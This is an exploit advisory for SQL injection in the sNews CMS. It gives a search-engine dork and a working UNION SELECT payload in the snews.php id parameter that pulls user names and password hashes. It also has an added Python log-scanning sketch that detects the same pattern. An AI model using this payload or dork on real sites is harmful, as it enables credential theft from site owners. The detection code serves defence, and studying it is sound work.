Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keywords: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
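
Detection sketch for the request pattern above, added here as an example and not part of the original advisory or of sNews itself. It assumes combined-format access logs and that a legitimate `id` is a plain decimal article number; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)  # closed or dangling /* */
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

# Constructed access-log lines (combined format); line 2 carries the advisory's example URL.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2013:10:00:01 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 6011',
    '203.0.113.9 - - [10/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=23%27 HTTP/1.1" 200 4980',
    '198.51.100.2 - - [10/Jan/2013:10:01:00 +0000] "GET /snews/index.php?id=abc HTTP/1.1" 404 210',
]


def classify_id(value):
    """Return 'ok', 'non_numeric' or 'union_select' for a URL-decoded id value."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    # Inline comments such as /**/ stand in for spaces; normalise before matching.
    normalised = SQL_COMMENT_RE.sub(" ", value)
    if UNION_SELECT_RE.search(normalised):
        return "union_select"
    return "non_numeric"


def scan(lines):
    """Return (line_number, verdict, decoded_id) for suspicious shownews requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        query = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/snews.php") or query.get("act", [""])[0] != "shownews":
            continue
        for value in query.get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((n, verdict, value))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Under the same assumption, the digits-only rule in `classify_id` is also the check the application should apply to `id` before the value reaches a query.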

Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*